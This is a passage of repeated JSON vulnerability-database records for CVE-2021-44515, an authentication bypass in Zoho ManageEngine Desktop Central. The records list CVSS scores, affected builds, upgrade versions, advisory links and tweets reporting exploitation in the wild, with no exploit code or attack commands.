"2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T21:55:36", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T21:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T21:55:36", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 19}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T21:55:44", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T21:55:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T21:55:44", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 20}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T22:25:33", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T21:55:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-16T22:25:33", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 21}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T22:25:43", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T22:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-16T22:25:43", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 22}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-16T22:55:33", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-16T22:25:43"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": 